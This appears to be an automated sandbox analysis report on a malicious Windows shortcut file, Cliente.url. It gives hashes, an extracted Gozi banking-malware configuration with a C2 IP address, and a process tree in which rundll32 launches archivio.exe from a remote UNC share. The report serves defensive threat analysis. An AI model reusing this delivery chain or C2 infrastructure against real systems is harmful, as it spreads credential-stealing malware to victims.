Analysis
-
max time kernel
146s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2023 14:19
Static task
static1
Behavioral task
behavioral1
Sample
Cliente.url
Resource
win7-20230831-en
windows7-x64
1 signatures
150 seconds
General
-
Target
Cliente.url
-
Size
194B
-
MD5
e8cb7e0b429afab68853fcde2d0910d3
-
SHA1
737c2809fcc4cf61c6c6ed8c2148e4eed77fdd7c
-
SHA256
9cbbd8f990a574e59d15d8f32f1b2442a5faaf57d89e0b4c022651813ff6b3bb
-
SHA512
dda9bc11b0bad298ae544bdd0305ed24704a988b436f43d5b539af8d7138e33d80f0d60e0ad60d81c5af973092625871b83638641c49e55f1a7334b70c431255
Malware Config
Extracted
Family
gozi
Extracted
Family
gozi
Botnet
5050
C2
45.93.139.24
Attributes
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
rsa_pubkey.plain
aes.plain
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
rundll32.exedescription pid process target process PID 3864 wrote to memory of 1348 3864 rundll32.exe archivio.exe PID 3864 wrote to memory of 1348 3864 rundll32.exe archivio.exe PID 3864 wrote to memory of 1348 3864 rundll32.exe archivio.exe
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Cliente.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3864 -
\??\UNC\62.173.146.71\scarica\archivio.exe"\\62.173.146.71\scarica\archivio.exe"2⤵PID:1348